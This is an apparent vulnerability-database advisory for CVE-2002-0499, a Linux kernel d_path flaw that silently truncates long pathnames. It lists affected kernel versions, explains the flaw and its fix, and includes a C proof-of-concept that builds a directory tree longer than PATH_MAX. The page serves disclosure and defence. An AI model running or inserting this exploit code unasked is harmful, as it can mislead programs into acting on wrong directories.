Unrated severityNVD Advisory· Published Aug 12, 2002· Updated Jun 16, 2026

CVE-2002-0499

Description

The d_path function in Linux kernel 2.2.20 and earlier, and 2.4.18 and earlier, truncates long pathnames without generating an error, which could allow local users to force programs to perform inappropriate operations on the wrong directories.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Affected products

Linux/Kernel42 versions
cpe:2.3:o:linux:linux_kernel:2.2.0:*:*:*:*:*:*:*+ 41 more
- cpe:2.3:o:linux:linux_kernel:2.2.0:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.1:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.10:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.11:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.12:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.13:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.14:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.15:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.16:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.17:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.18:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.19:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.2:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.20:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.3:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.4:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.5:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.6:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.7:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.8:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.9:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.3.0:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.3.99:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.0:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.1:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.10:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.11:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.12:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.13:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.14:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.15:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.16:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.17:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.18:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.2:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.3:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.4:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.5:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.6:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.7:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.8:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.9:*:*:*:*:*:*:*
Ubuntu/Linux Kernelllm-fuzzy
Range: <=2.2.20, <=2.4.18

Patches

Vulnerability mechanics

Root cause

"The d_path function in the Linux kernel truncates long pathnames without reporting an error."

Attack vector

Local users can exploit this vulnerability by creating a directory structure with a path exceeding the buffer size allocated for pathnames. When the `d_path()` function attempts to convert this long path into a string, it truncates the path without indicating an error. This can lead to programs operating on incorrect or unintended directories, potentially allowing for inappropriate operations. [ref_id=1].

Affected code

The vulnerability resides in the `d_path()` function within the Linux kernel's `fs/dcache.c` file. This function is responsible for converting a dentry structure into an ASCII pathname. The issue occurs when the generated pathname exceeds the fixed-size buffer, leading to truncation without error reporting [ref_id=1].

What the fix does

The patch modifies the `d_path()` function to return an error code of -ENAMETOOLONG when the path exceeds the buffer length, instead of truncating it. This change ensures that callers are explicitly notified of the overly long path, preventing them from proceeding with truncated information. The fix is applied to the `fs/dcache.c` file [ref_id=2].

Preconditions

authThe attacker must have local user access to the affected system.
inputThe attacker must be able to create a directory structure with a path length exceeding the kernel's buffer limit.

Reproduction

```c /* * 2.2.x/2.4.x Linux kernel d_path proof-of-concept exploit * * Bug found by cliph */

#include <unistd.h> #include <stdio.h> #include <limits.h> #include <errno.h> #include <paths.h>

/* * Note: on Linux 2.2.x PATH_MAX = PAGE_SIZE - 1 that gives us 1 byte for * trailing '\0' */

#define PATH_COMPONENT "123456789abcdef"

void err(char * msg) { if (errno) { perror(msg); exit(1); } }

int main() { char buf[PATH_MAX + 1]; /* think of trailing '\0' */ int len;

errno = 0;

chdir(_PATH_TMP); err("chdir");

/* show CWD before exploiting the bug */ getcwd(buf, sizeof(buf)); err("getcwd #1"); fprintf(stderr, "CWD=%.40s\n", buf);

/* creating long directory tree - it must exceed PATH_MAX characters */ for (len = 0; len <= PATH_MAX; len += strlen(PATH_COMPONENT) + 1) { errno = 0; mkdir(PATH_COMPONENT, 0700); if (errno != EEXIST) err("mkdir"); errno = 0; chdir(PATH_COMPONENT); err("mkdir"); }

/* show CWD before exploiting the bug */ getcwd(buf, sizeof(buf)); err("getcwd #1"); fprintf(stderr, "CWD=%.40s... [stripped]\n", buf);

return 0; } ``` [ref_id=1]

Generated on Jun 2, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

www.securityfocus.com/bid/4367nvdExploitVendor Advisory
www.iss.net/security_center/static/8634.phpnvdVendor Advisory
www.securityfocus.com/archive/1/264117nvdVendor Advisory
archives.neohapsis.com/archives/vulnwatch/2002-q1/0074.htmlnvd
www.cs.helsinki.fi/linux/linux-kernel/2002-13/0054.htmlnvd

News mentions

No linked articles in our index yet.

cvss	0.000
epss	0.001
exploit	0.030
kev	0.000
patch	0.000
ransomware	0.000